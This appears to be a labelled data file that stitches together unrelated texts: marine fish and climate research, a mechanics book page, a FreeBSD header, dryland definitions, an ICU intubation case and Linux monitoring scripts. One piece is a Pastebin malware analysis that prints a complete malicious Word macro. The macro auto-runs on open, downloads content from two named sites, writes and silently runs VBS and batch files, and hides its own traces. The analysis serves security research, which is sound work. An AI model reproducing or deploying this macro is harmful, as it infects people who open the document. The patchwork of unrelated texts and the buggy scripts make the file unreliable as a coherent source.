However, a growing body of research suggests that OA causes a wide range of deleterious physiological responses in marine fishes. Ishimatsu et al. (2004) explain that elevated levels of ambient CO2 are associated with a condition in fish known as “hypercapnia,” which causes disturbances that limit the function of the respiratory, circulatory, and nervous systems in fish. They suggest that the long-term effects of hypercapnia may inhibit important life functions by reducing growth, reproduction, and calcification. Scientists who are studying tropical ecosystems report that OA may have significant effects on tropical fish. Dixson et al. (2010), Devine et al. (2012) and Munday et al. (2009) found significant effects of OA on the development of sensory mechanisms in tropical fish, and report that exposure to acidified seawater may impair the ability of these fish to recognize olfactory clues necessary for predator avoidance in tropical reefs. Studies have shown that the effects of exposure to elevated CO2 levels are greatest in fish eggs, larvae, and juveniles, suggesting that fish in early developmental stages may be the most vulnerable to the impacts of ocean acidification (Kikkawa et al. 2003; Ishimatsu et al. 2004). Other studies suggest that OA may change important fish habitats. Palacios and Zimmerman (2007) found that higher CO2 concentrations are positively correlated with reproductive output, below-ground biomass, and vegetative proliferation in eelgrass (Zostera marina). However, they note that this response is not necessarily beneficial to fish that are associated with eelgrass meadows, because other characteristics of CO2-rich environments (e.g., prolific algae growth and diminished water quality) are likely to overwhelm the positive effects of increased eelgrass productivity. Although the precise effect of acidification on local fish populations is uncertain, it’s likely that ocean acidification would reduce marine biodiversity through the loss of pH- and CO2-sensitive species and the likely reduction of habitat complexity (Widdicombe and Spicer 2008). Ocean Acidification Since the late 18th century, the average open ocean surface pH levels worldwide have decreased by about 0.1 pH units, a decrease of pH from about 8.2 before the industrial revolution to about 8.1 today. A 0.1 change in pH is significant since it represents about a 30 percent increase in ocean acidity (the pH scale is logarithmic, meaning that for every one point change in pH, the actual concentration changes by a factor of ten). Scientists estimate that by 2100 ocean waters could be nearly 150% more acidic than they are now, resulting in ocean acidity not experienced on earth in 20 million years. The best Pacific Northwest ocean acidification data we have so far are from the Puget Sound area, where pH has decreased about as much as the worldwide average (a decrease ranging from 0.05 to 0.15 units). Sources: Feely et al. 2010, NOAA PMEL Carbon Program 2013 Increasing ocean temperatures may affect the distribution of marine and estuarine fish, with warmer temperatures creating more favorable habitats closer to the poles and nearer to the bottom of the ocean (Perry et al. 2005). Radovich (1961) has documented this phenomenon on the Pacific coast of North America by correlating unusually warm sea-surface temperatures with an increased number of anomalous fish landings between 1957 and 1959. He cites several instances of warm-water species being caught north of their expected ranges including the following: Pacific bonito (Sarda chiliensis) in Eureka, California, skipjack tuna (Katsuwonus pelamis) off Cape Blanco in Oregon, swordfish (Xiphias gladius) in Monterey Bay, and dolphinfishes (Coryphaena spp.) as far north as Grays Harbor, Washington. Perry et al. (2005) note that fish with slower developmental rates or more complex life histories are less capable of adjusting to warming temperatures through rapid demographic responses like movement towards the poles. They anticipate that fish with these characteristics are more likely to be affected by rising ocean temperatures due to their inability to rapidly respond to unfavorable habitat changes. In addition to distributional responses, increased temperatures may affect fish by encumbering basic life functions. The amount of energy allocated toward growth and reproduction in fish usually declines as temperatures approach the extreme ends of species-specific tolerance ranges (Roessig et al. 2004). This is demonstrated in the English sole, which exhibits significantly slower growth in temperatures above 17.5° C (63.5° F) and is likely to experience reduced growth in extreme estuarine temperatures (Yoklavich 1982; Rooper et al. 2003). Similarly, studies of sand lances (Ammodytes spp.) indicate that water temperature plays an important role in spawning timing and affects both recruitment and growth rates (Monaco and Emmett 1990). Increased water temperatures also compromise habitat quality for cold water species. According to the Oregon Department of Fish and Wildlife (ODFW 2014), higher water temperatures may accelerate the loss of areas that provide important cool water refugia and resting habitats for anadromous salmonid species. Increasing Ocean Temperatures Worldwide, ocean temperatures rose at an average rate of 0.07° C (0.13° F) per decade between 1901 and 2012. Since 1880, when reliable ocean temperature observations first began, there have been no periods with higher ocean temperatures than those during the period from 1982 – 2012. The periods between 1910 and 1940 (after a cooling period between 1880 and 1910), and 1970 and the present are the times within which ocean temperatures have mainly increased. Describing how the worldwide trend translates to trends off the Oregon coast is a complicated matter. Sea surface temperatures are highly variable due to coastal upwelling processes and other climatic events that occur in irregular cycles (e.g., El Niño events). We do have 27 years (1967-1994) of water temperature data collected from near the mouth of the Coos estuary that indicate through preliminary analyses a very weak trend towards warming water temperatures. Fifteen years (1995-2010) of data from multiple stations further up the South Slough estuary show very little water temperature change. Sources: USEPA 2013, SSNERR 2013, Cornu et al. 2012 Most of the climate-related alterations to fish habitats suggest increased likelihood of secondary effects. For example, the potential loss of tidal marshes can lead to reduced water quality in estuaries, because tidal marshes regulate nutrients and filter pollutants (Glick et al. 2007). High nutrient levels combined with increasing ocean temperatures and adequate light provide the ideal conditions for explosive algae growth. The overproduction of algae can damage aquatic ecosystems by blocking sunlight and reducing oxygen levels in the water column (USEPA 2013a). Hypoxia, low levels of dissolved oxygen in water, has deleterious effects on fish. Hypoxic conditions are linked to limited reproductive function in several species of marine and estuarine fish (Giorgi and Congleton 1984; Landry et al. 2007; Thomas et al. 2007). In extreme circumstances, low oxygen levels have caused mass mortalities (Pacific Fishery Management Council 1983). Climate change is likely to cause changes in a variety of ocean conditions that will affect fish: • Climate change will likely affect ocean circulation and have some effect on Pacific coast upwelling patterns (Hayward 1997, Bakun 1990). • Research suggests a correlation between ocean temperature and increased severity and frequency of storms (Knutson et al. 2010, Webster et al. 2005, McGabe et al. 2001). • The oceanographic effects of climate change may directly affect the abundance and distribution of marine fishes by affecting the availability of food resources. For example, Monaco and Emmett (1990) found that food availability for larval northern anchovy (Engraulis mordaxis) is reduced by storms or strong upwelling conditions. However, they also find that storms increase food abundance for adults. • ODFW(2014) suggests that rising temperature may be cause for increased ocean stratification, a trend which has previously been associated with poor foraging conditions for salmonids. Pacific Decadal Oscillation and El Niño Southern Oscillation The Pacific Decadal Oscillation (PDO) and El Niño Southern Oscillation (ENSO) are cyclical climatic patterns that affect weather and ocean currents in and around the Pacific ocean. PDO is a pattern of oceanic conditions that shift every few decades. During a cold (negative) phase, the west Pacific warms, and the east Pacific cools; the opposite is true of a warm (positive) phase. ENSO is a climatic event that tends to occur every two to seven years and is characterized by anomalous warming of tropical Pacific waters. Locally, this warming is associated with drier conditions, warmer temperatures, and lower precipitation and streamflow, although it can also result in greater winter “storminess” and flooding. Source: Mysak 1986 In addition to the effects of climate change, Pacific Decadal Oscillation (PDO) and El Niño Southern Oscillation (ENSO) are cyclical patterns of climate variability (see sidebar) that influence ocean conditions, as well as fish abundance and distribution. The ecological response to shifts in PDO first affects primary producers and consumers before working to higher level consumers such as salmon. Warm PDO periods may be associated with decreased primary productivity in local waters due to the increased stratification of the California Current off the Oregon coast (Mantua et al. 1997; Hare et al. 1999). These events are likely to affect salmon marine survival rates (Hare el a. 1999). Changing ocean conditions may affect fish populations through abiotic mechanisms such as modifications to critical habitats. Changes in precipitation regimes associated with the El Niño Southern Oscillation (ENSO), for example, may limit access to spawning grounds, and systems located near the southern end of salmon distribution ranges may reach critical levels as waters warm (Naiman et al. 2002). Many aspects of climate change are expected to alter the water cycle. The anticipated changes include increased and earlier peak stream flows and reduced summer stream flows (Defenders of Wildlife and ODFW 2008). ODFW (2014) suggests that these changes are likely to compound existing factors that are already limiting the suitability of fish habitats. They recognize the following as factors that are currently affecting critical fish habitats: • Loss of peripheral stream connections • Degradation of in-stream structures • Unfavorable changes to water temperature, sedimentation regimes, barriers to upstream passage, and availability of gravel. Increased water temperatures may limit the reproductive function of riverine fish that are already vulnerable. The white sturgeon (Acipenser transmontanus), for example, has been shown to have substantial egg mortality in water temperatures above 18° C (64° F)(Wagoner et al. 1990). Additionally, warmer waters may accelerate habitat loss by effectively eliminating cool backwaters and other areas that provide important refugia and resting habitats for salmon species (ODFW 2014; Defenders of Wildlife and ODFW 2008). Warmer air temperatures and altered patterns of precipitation are a likely to directly influence the frequency, magnitude, and extent of extreme weather including flooding and drought (Reiman and Isaak 2010; Defenders of Wildlife and ODFW 2008). In instances where these extreme weather events compromise riparian habitats, the effects of climate change on fish may be accelerated by reductions in shading, bank stabilization, food availability, and nutrient and chemical mediation (ODFW 2014). Local Effects of Changing Ocean Conditions The physical conditions of an estuary are sensitive to changes in long-term oceanographic fluctuations. O’Higgins and Rumrill have studied the physical response of the South Slough to changes in the Pacific Decadal Oscillation (PDO) index by monitoring water quality in the South Slough estuary from 2000 to 2006. Their data show a positive and statistically significant relationship between temperature and the PDO index. They also found a negative and statistically significant relationship between dissolved oxygen and the PDO index. This suggests that local estuaries are both anomalously warm and less oxygenated during the warmer (positive) phases of the PDO. Similarly, Hamilton has studied the relationship between the physical conditions of local waters and El Niño Southern Oscillation (ENSO) events between 2004 and 2010. Her data demonstrate a positive and statistically significant relationship between temperature and a multivariate ENSO index at stations in Charleston, South Slough’s Valino Island, and South Slough’s Winchester Creek. Sources: O’Higgins and Rumrill 2007, Hamilton 2011
__label__pos
0.949995
Advertisement Principles of Engineering Mechanics Kinematics — The Geometry of Motion • Millard F. BeattyJr. Book Part of the Mathematical Concepts and Methods in Science and Engineering book series (MCSENG, volume 32) Table of contents 1. Front Matter Pages i-xvii 2. Kinematics 1. Front Matter Pages 1-1 2. Millard F. Beatty Jr. Pages 3-84 3. Millard F. Beatty Jr. Pages 85-149 4. Millard F. Beatty Jr. Pages 151-227 3. Erratum 1. Millard F. Beatty Jr. Pages 397-397 2. Millard F. Beatty Jr. Pages 397-398 3. Millard F. Beatty Jr. Pages 398-399 4. Millard F. Beatty Jr. Pages 401-401 4. Back Matter Pages 353-401 About this book Introduction Separation of the elements of classical mechanics into kinematics and dynamics is an uncommon tutorial approach, but the author uses it to advantage in this two-volume set. Students gain a mastery of kinematics first – a solid foundation for the later study of the free-body formulation of the dynamics problem. A key objective of these volumes, which present a vector treatment of the principles of mechanics, is to help the student gain confidence in transforming problems into appropriate mathematical language that may be manipulated to give useful physical conclusions or specific numerical results. In the first volume, the elements of vector calculus and the matrix algebra are reviewed in appendices. Unusual mathematical topics, such as singularity functions and some elements of tensor analysis, are introduced within the text. A logical and systematic building of well-known kinematic concepts, theorems, and formulas, illustrated by examples and problems, is presented offering insights into both fundamentals and applications. Problems amplify the material and pave the way for advanced study of topics in mechanical design analysis, advanced kinematics of mechanisms and analytical dynamics, mechanical vibrations and controls, and continuum mechanics of solids and fluids. Volume I of Principles of Engineering Mechanics provides the basis for a stimulating and rewarding one-term course for advanced undergraduate and first-year graduate students specializing in mechanics, engineering science, engineering physics, applied mathematics, materials science, and mechanical, aerospace, and civil engineering. Professionals working in related fields of applied mathematics will find it a practical review and a quick reference for questions involving basic kinematics. Keywords applied mathematics civil engineering classical mechanics continuum mechanics design dynamics engineering mechanics fluid geometry kinematics material materials Mathematica mechanics vibration Authors and affiliations • Millard F. BeattyJr. • 1 1. 1.University of KentuckyLexingtonUSA Bibliographic information
__label__pos
0.875065
Advertisement dynamoo Malicious Word macro Sep 16th, 2015 709 0 Never Not a member of Pastebin yet? Sign Up, it unlocks many cool features! 1. olevba 0.31 - http://decalage.info/python/oletools 2. Flags        Filename                                                         3. -----------  ----------------------------------------------------------------- 4. OLE:MAS-HB-V report~1.doc 5.   6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown) 7.   8. =============================================================================== 9. FILE: report~1.doc 10. Type: OLE 11. ------------------------------------------------------------------------------- 12. VBA MACRO ThisDocument.cls 13. in file: report~1.doc - OLE stream: u'Macros/VBA/ThisDocument' 14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 15.   16. Sub Auto_Open() 17.     Kuricknms 18. End Sub 19. Sub Kuricknms() 20.     QJKHWDJKASD = "qjwhekj 12 gejhhkasjdh kg12hjdg ahjsgd" 21.     Subkaka 22. End Sub 23. Sub AutoOpen() 24.     Kuricknms 25. End Sub 26. Sub Subkaka() 27.     28.     Dim NJKAWD As String, OOODJWD As String, SSPCKDSD As String 29.     Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String 30.     Dim PBIn As String, KnsdD As Date, CONT As String 31.     Dim Ndjs As Integer 32.     Dim ABTH As String, BBTH As String 33.     Dim klmn As Integer, TTKK As String 34.     35.     Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer 36.     37.     KnsdD = #2/12/2010# 38.     39.     SSPCKDSD = spb(90 + 0 + 2) 40.     NJKAWD = Samsung(9898) 41.     OOODJWD = "Temp" 42.     PH2 = Module1.Jkjdnda(OOODJWD) + SSPCKDSD 43.       44.     ART = 315 45.     BFT = 316 46.     47.     Randomize 48.     Ndjs = Int(Year(KnsdD)) - 1906 49.     ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs) 50.     ATTH = ATTH + "://" 51.   52.     TSTS = ".tx" + "t" 53.     CDDD = "66836487162" + TSTS 54.     LNSS = "sasa" + TSTS 55.     STT1 = "site/" 56.     STT1 = "thebackpack.fr/w" + "p-content/themes/salient/wpbakery/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/" 57.     STT2 = "obiectivhouse.ro/w" + "p-content/plugins/maintenance/load/images/fonts-icon/" 58.     PBIn = ATTH + STT1 + CDDD 59.     60.     CONT = Module2.Huqwhdkjqwl(PBIn) 61.     BHJD = Right(CONT, 15) 62.     63.     hdjshd = InStr(1, BHJD, "exit") 64.     If (hdjshd = 0) Then 65.     NJKQWD = "" 66.     PBIn = ATTH + NJKQWD + CDDD 67.     CONT = Module2.Huqwhdkjqwl(PBIn) 68.     NFBH = Module2.Huqwhdkjqwl(ATTH + NJKQWD + LNSS) 69.     Else 70.     NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS) 71.     End If 72.     73.     Module2.Crispy (1) 74.     75.     CPLRP1 = "pioneer" 76.     CPLRP2 = "paytina" 77.     CPLRP3 = "cr" & "anberry" 78.     79.     CONT = Replace(CONT, CPLRP1, PH2, 1) 80.     CONT = Replace(CONT, CPLRP2, NFBH, 1) 81.     CONT2 = Replace(CONT, CPLRP3, NJKAWD, 1) 82.     83.     TTKK = "$" 84.     85.     klmn = CInt(Len(CONT2)) 86.     For i = 1 To klmn 87.         If (Mid(CONT2, i, 1) = TTKK) Then 88.             If (Mid(CONT2, i - 1, 1) = TTKK) Then 89.                 GEFORCE1 = Mid(CONT2, 1, i - 2) 90.                 GEFORCE2 = Mid(CONT2, i + 1, klmn - i) 91.             End If 92.         End If 93.     Next i 94.     95.     HQUJD = ".v" 96.     ABTH = PH2 + NJKAWD & HQUJD + "bs" 97.     BBTH = PH2 + NJKAWD + ".bat" 98.     99.     100.     Open ABTH For Output As #ART 101.     Print #ART, GEFORCE1 102.     Close #ART 103.     104.     Module2.Crispy (1) 105.       106.     Open BBTH For Output As #BFT 107.     Print #BFT, GEFORCE2 108.     Close #BFT 109.     110.     Module2.Crispy (1) 111.     112.     QUHDQ = Module2.Fuflmdjoo(BBTH) 113.     Module1.Hameleon 114.     115. End Sub 116. Sub Workbook_Open() 117.     JHQDJBASND = "asdbj ashdksajhdjksa" 118.     Kuricknms 119. End Sub 120. Public Function NHdjhasbdhas(a As Object) 121. NHdjhasbdhas = (a.responsetext) 122. End Function 123. Public Function Samsung(a As Integer) 124. Randomize 125. Samsung = CStr(Int((a / 2 * Rnd) + a)) 126. End Function 127. Public Function Creasqwdqwjdk(a As String) 128. Creasqwdqwjdk = CreateObject(a) 129. End Function 130. Public Function spb(sps As Integer) 131. spb = Chr(sps) 132. End Function 133. Public Function Stkjrhbs(a As Integer) 134. Stkjrhbs = Sgn(a) 135. End Function 136.   137.   138.   139.   140. ------------------------------------------------------------------------------- 141. VBA MACRO Module1.bas 142. in file: report~1.doc - OLE stream: u'Macros/VBA/Module1' 143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 144.   145. Sub Hameleon() 146. Dim ij As Integer 147. Dim charCount As Integer 148. charCount = ActiveDocument.Characters.Count - 1 149. QJKDD = "k" 150. QJHWDSAD = "qwdhjqwk dhkjd d" 151. JFQW = "t" 152. ij = 0 153. Do While True 154.     ij = ij + 1 155.     If (ActiveDocument.Characters(ij) = QJKDD) Then 156.         MBASNMDBW = "qwmdh njh1jaskjhdk h1klh adjks" 157.         If (ActiveDocument.Characters(ij - 1) = JFQW) Then 158.             ActiveDocument.Range(Start:=0, End:=ij).Delete 159.             ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack 160.             Exit Do 161.         End If 162.     End If 163.     If (ij = charCount) Then 164.         Exit Do 165.     End If 166. Loop 167. End Sub 168.   169. Public Function Jkjdnda(sps As String) 170. JKQHWDS = "wq,mnd,mn1djlkasjd kljddk12jdkl j" 171. Jkjdnda = Environ(sps) 172. End Function 173.   174.   175.   176.   177. ------------------------------------------------------------------------------- 178. VBA MACRO Module2.bas 179. in file: report~1.doc - OLE stream: u'Macros/VBA/Module2' 180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 181.   182. Public Function Kakarumba(n As Integer) 183. Dim i As Integer 184. Dim hduw As Integer 185. For i = 1 To n Step 1 186.     Randomize 187.     hduw = Rnd 188.     Kakarumba = Kakarumba + hhr(Int(121 * hduw) + 90 + 7) 189. Next i 190. XQKLJDHJQ = "qwdkh2 k1hdlkjk21 dhjgasd" 191. End Function 192. Public Function Fuflmdjoo(a As String) 193. Dim bydd As Variant 194. bydd = Shell(a, 0) 195. BJQHBDADS = "asdhjk qdhjqkwhdk qwhdlkj dkhasd" 196. End Function 197. Public Function Huqwhdkjqwl(nbqjbdjqw As String) 198. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, NNNMMHWDKJHAJSdsajgdh As Object, BHJQGWD As String 199. Dim jahsghjJkhsd As String, dddc As Integer, QYDGGJASSSS As String, AsaHuhqdjhasd As String, hqudhhajs As String, AAHQJD As String 200. AsaHuhqdjhasd = nbqjbdjqw 201. JKAHJKSD = AsaHuhqdjhasd 202. jahsghjJkhsd = AsaHuhqdjhasd 203. 'asdhjsak dgashjdg as 204. JQHWD = Chr(Round(4.55, 1) + 0.4 + 72) 205. HQUD = JQHWD + "L2.S" 206. Dim hquwd As Date, ajsid As Integer 207. hquwd = #5/10/2011# 208. ajsid = Int(Month(hquwd)) 209. Randomize 210. BHJQWD = klmn(68 + Int(Month(DateAdd("m", 1, "6/3/06")))) 211. dddc = 4 - ajsid 212. HQDUQ = hhr(Val(81 + dddc)) 213. hqudhhajs = klmn(Val(78 + dddc)) 214. BHQDHJWQDW = HQUD + "erver" + "XML" + BHJQWD 215. BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ 216. 'akjshdj ashdk sd 217. 'asdhkajks dhajsgd 218. QYDGGJASSSS = "E" 219. NNNHDQYUWG = hhr(11 * 2 * 4 + 4 * dddc) 220. QYDGGJASSSS = hhr(71) + QYDGGJASSSS & NNNHDQYUWG 221. DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ 222. 'asdhgajs gdhajsg dsa 223.   224. 'asdhgajs gdhajsg dsa 225. Set NNNMMHWDKJHAJSdsajgdh = CreateObject(DWQJDIQWDKWQJDHBB) 226. 'anbdqmnbdqw bdnmq dqw 227. NNNMMHWDKJHAJSdsajgdh.Open QYDGGJASSSS, jahsghjJkhsd 228. NNNMMHWDKJHAJSdsajgdh.Send (BHJQGWD) 229. AAHQJD = ThisDocument.NHdjhasbdhas(NNNMMHWDKJHAJSdsajgdh) 230. Huqwhdkjqwl = AAHQJD 231.   232. End Function 233. Sub Crispy(NSee As Long) 234. Dim NnSke As Long 235. NnSke = Timer + NSee 236. Do While Timer < NnSke 237. DoEvents 238. Loop 239. QJKHWD = "asdjhjk qhdjq kwdh hd " 240. End Sub 241.   242.   243. Public Function klmn(pag As Integer) 244. klmn = Chr(pag) 245. End Function 246.   247. Public Function hhr(sps As Integer) 248. hhr = Chr(sps) 249. End Function 250.   251.   252.   253. +------------+----------------------+-----------------------------------------+ 254. | Type       | Keyword              | Description                             | 255. +------------+----------------------+-----------------------------------------+ 256. | AutoExec   | AutoOpen             | Runs when the Word document is opened   | 257. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  | 258. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  | 259. | Suspicious | Open                 | May open a file                         | 260. | Suspicious | Shell                | May run an executable file or a system  | 261. |            |                      | command                                 | 262. | Suspicious | CreateObject         | May create an OLE object                | 263. | Suspicious | Chr                  | May attempt to obfuscate specific       | 264. |            |                      | strings                                 | 265. | Suspicious | Environ              | May read system environment variables   | 266. | Suspicious | Output               | May write to a file (if combined with   | 267. |            |                      | Open)                                   | 268. | Suspicious | Print #              | May write to a file (if combined with   | 269. |            |                      | Open)                                   | 270. | Suspicious | Lib                  | May run code from a DLL                 | 271. | Suspicious | Lib                  | May run code from a DLL (obfuscation:   | 272. |            |                      | VBA expression)                         | 273. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  | 274. |            |                      | be used to obfuscate strings (option    | 275. |            |                      | --decode to see all)                    | 276. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   | 277. |            |                      | may be used to obfuscate strings        | 278. |            |                      | (option --decode to see all)            | 279. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   | 280. |            | Strings              | may be used to obfuscate strings        | 281. |            |                      | (option --decode to see all)            | 282. +------------+----------------------+-----------------------------------------+ Advertisement Add Comment Please, Sign In to add comment Advertisement
__label__pos
0.770747
/* $FreeBSD: stable/10/usr.sbin/rtadvd/advcap.h 173412 2007-11-07 10:53:41Z kevlo $ */ /* $KAME: advcap.h,v 1.5 2003/06/09 05:40:54 t-momose Exp $ */ /* * Copyright (C) 1994,1995 by Andrey A. Chernov, Moscow, Russia. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* Based on Id: termcap.h,v 1.8 1996/09/10 12:42:10 peter Exp */ #ifndef _ADVCAP_H_ #define _ADVCAP_H_ #include __BEGIN_DECLS extern int agetent(char *, const char *); extern int agetflag(const char *); extern int64_t agetnum(const char *); extern char *agetstr(const char *, char **); __END_DECLS #endif /* _ADVCAP_H_ */
__label__pos
0.983017
Dry and Sub-humid Lands Biodiversity Definitions Dry and Sub-humid Lands Dryland, Mediterranean, arid, semi-arid, grassland and savannah ecosystems Hyper-arid ecosystems Precipitation/potential evapotranspiration (P/PET) ratio of less than 0.05 Arid and semi-arid ecosystems Arid - Precipitation/potential evapotranspiration (P/PET) ratio is greater than or equal to 0.05 and less than 0.20 Semi-arid - Precipitation/potential evapotranspiration (P/PET) ratio is greater than or equal to 0.20 and less than 0.50 Mediterranean ecosystems No single climatic or bioclimatic definition of these areas has been developed. They generally refer to areas with cool, wet winters and warm or hot summers. Grassland and savannah ecosystems Grassland - Loosely defined as areas dominated by grasses (members of the family Poaceae excluding bamboos) or grass-like plants with few woody plants. Natural grassland ecosystems are typically characteristic of areas with three main features: periodic drought, fire, and grazing by large herbivores. Savannah- Tropical ecosystems characterized by dominance at the ground layer of grasses and grass-like plants. They form a continuum from treeless plains through open woodlands to virtually closed-canopy woodland with a grassy under-storey.
__label__pos
0.748839
Skip to Main Content Case image A 58-year-old man with a known history of poorly controlled hypertension is evaluated in the emergency department after being found down for an unknown period of time. He has left-sided hemiparesis and neglect, a left frontotemporal scalp contusion, and somnolence. Because the patient could not remember the onset of symptoms and the mechanism of injury is uncertain, a rigid cervical collar is placed by emergency medical services in the field. Computed tomography (CT) of the head demonstrates a large right thalamic intracerebral hemorrhage with intraventricular extension. There is no skull fracture, cervical spine injury, or gross cervical misalignment. During the initial evaluation, he is interactive and able to communicate verbally, and he denies cervical tenderness to a confrontational examination. Just prior to his transfer to the intensive care unit (ICU), he becomes progressively obtunded, with a symmetrical increase in bilateral lower extremity tone. His respiratory status rapidly declines; he is now making grunting noises and actively using his accessory muscles. It is not known when he last ate, and examination of the oropharynx reveals a blunted gag reflex and weak cough. Does this patient need to be intubated? Certain indications for intubation in the neurocritically ill are similar to other patient cohorts (ie, failure to maintain or protect the airway or failure of oxygenation and or ventilation).1 The indications for immediately securing the airway in our specific patient include the following: 1. This patient is a state of acute neurologic decline with a worsening neurologic examination. 2. He has dangerously dulled airway protective reflexes and is considered to have a full stomach, putting him at risk for large-volume gastric aspiration. 3. He will likely require additional invasive procedures with sedation (eg, external ventricular drain, intracranial pressure (ICP) monitor placement, or craniotomy). 4. He will be transported between units and likely will undergo further imaging studies, requiring supine positioning. Airway considerations and challenges specific to the neurocritically ill include the following: 1. The need to perform serial neurologic examinations makes intermediate- and long-acting sedation and neuromuscular blockade fundamentally undesirable. 2. Hypoxemia is a potent mediator of secondary brain injury and must be avoided. 3. In patients with ischemia-reperfusion, such as cardiac arrest, ischemic stroke, and sometimes traumatic brain injury (TBI), hyperoxia (such as occurs when 100% Fio2 is administered to a patient with good cardiopulmonary function) should be avoided: it potentiates reperfusion injury and is associated with worse outcomes. 4. Hyperventilation increases cerebrovascular tone, acutely decreasing cerebral blood flow, with implications on maintaining cerebral perfusion and managing ICP. 5. Hypoventilation decreases cerebrovascular tone, increasing cerebral blood volume and acutely driving up ICP. 6. In neurotrauma, head and facial trauma can create upper airway obstruction, and there is a high incidence of cervical spine injury and instability, placing the cervical spinal cord at risk during intubation and other airway maneuvers. 7. Patients with acute ischemic stroke are exquisitely sensitivity to changes in hemodynamics, such ... Pop-up div Successfully Displayed This div only appears when the trigger link is hovered over. Otherwise it is hidden from view.
__label__pos
0.978346
Archive for 2011年8月25日 Linux常用的系统监控shell脚本 1、查看主机网卡流量 #!/bin/bash #network #Mike.Xu while : ; do time=’date +%m”-”%d” “%k”:”%M’ day=’date +%m”-”%d’ rx_before=’ifconfig eth0|sed -n “8″p|awk ‘{print $2}’|cut -c7-’ tx_before=’ifconfig eth0|sed -n “8″p|awk ‘{print $6}’|cut -c7-’ sleep 2 rx_after=’ifconfig eth0|sed -n “8″p|awk ‘{print $2}’|cut -c7-’ tx_after=’ifconfig eth0|sed -n “8″p|awk ‘{print $6}’|cut -c7-’ rx_result=$[(rx_after-rx_before)/256] tx_result=$[(tx_after-tx_before)/256] echo “$time Now_In_Speed: “$rx_result”kbps Now_OUt_Speed: “$tx_result”kbps” sleep 2 done 2、系统状况监控 #!/bin/sh #systemstat.sh #Mike.Xu IP=192.168.1.227 top -n 2| grep “Cpu” >>./temp/cpu.txt free -m | grep “Mem” >> ./temp/mem.txt df -k | grep “sda1″ >> ./temp/drive_sda1.txt #df -k | grep sda2 >> ./temp/drive_sda2.txt df -k | grep “/mnt/storage_0″ >> ./temp/mnt_storage_0.txt df -k | grep “/mnt/storage_pic” >> ./temp/mnt_storage_pic.txt time=`date +%m”.”%d” “%k”:”%M` connect=`netstat -na | grep “219.238.148.30:80″ | wc -l` echo “$time $connect” >> ./temp/connect_count.txt 3、监控主机的磁盘空间,当使用空间超过90%就通过发mail来发警告 #!/bin/bash #monitor available disk space SPACE=’df | sed -n ‘/ / $ / p’ | gawk ‘{print $5}’ | sed ’s/%//’ if [ $SPACE -ge 90 ] then [email protected] fi 4、 监控CPU和内存的使用情况 #!/bin/bash #script to capture system statistics OUTFILE=/home/xu/capstats.csv DATE=’date +%m/%d/%Y’ TIME=’date +%k:%m:%s’ TIMEOUT=’uptime’ VMOUT=’vmstat 1 2′ USERS=’echo $TIMEOUT | gawk ‘{print $4}’ ‘ LOAD=’echo $TIMEOUT | gawk ‘{print $9}’ | sed “s/,//’ ‘ FREE=’echo $VMOUT | sed -n ‘/[0-9]/p’ | sed -n ‘2p’ | gawk ‘{print $4} ‘ ‘ IDLE=’echo $VMOUT | sed -n ‘/[0-9]/p’ | sed -n ‘2p’ |gawk ‘{print $15}’ ‘ echo “$DATE,$TIME,$USERS,$LOAD,$FREE,$IDLE” >> $OUTFILE 5、全方位监控主机 #!/bin/bash # check_xu.sh # 0 * * * * /home/check_xu.sh DAT=”`date +%Y%m%d`” HOUR=”`date +%H`” DIR=”/home/oslog/host_${DAT}/${HOUR}” DELAY=60 COUNT=60 # whether the responsible directory exist if ! test -d ${DIR} then /bin/mkdir -p ${DIR} fi # general check export TERM=linux /usr/bin/top -b -d ${DELAY} -n ${COUNT} > ${DIR}/top_${DAT}.log 2>&1 & # cpu check /usr/bin/sar -u ${DELAY} ${COUNT} > ${DIR}/cpu_${DAT}.log 2>&1 & #/usr/bin/mpstat -P 0 ${DELAY} ${COUNT} > ${DIR}/cpu_0_${DAT}.log 2>&1 & #/usr/bin/mpstat -P 1 ${DELAY} ${COUNT} > ${DIR}/cpu_1_${DAT}.log 